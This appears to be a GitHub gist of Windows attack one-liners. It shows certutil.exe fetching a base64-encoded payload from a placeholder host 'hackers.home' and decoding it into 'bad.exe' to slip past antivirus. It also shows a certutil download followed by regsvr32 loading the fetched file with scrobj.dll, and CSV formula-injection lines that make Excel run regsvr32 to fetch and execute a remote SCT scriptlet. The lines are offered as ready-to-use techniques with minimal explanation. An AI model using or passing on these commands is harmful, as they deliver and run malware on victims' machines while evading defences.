Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
# certutil.exe bypass av on download + base64 Decoding
#first base64 encoding the malicious file so that to an edge device it just appears as harmless text.
#Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file
#into the executable.
#This is illustrated in Xavier Mertens handler diary.
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
# certutil.exe bypass av on download - dll injection from regsvr32.exe
certutil -urlcache -split -f [serverURL] file.blah
regsvr32.exe /s /u /I:file.blah scrub.dll
#csv malware injection
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.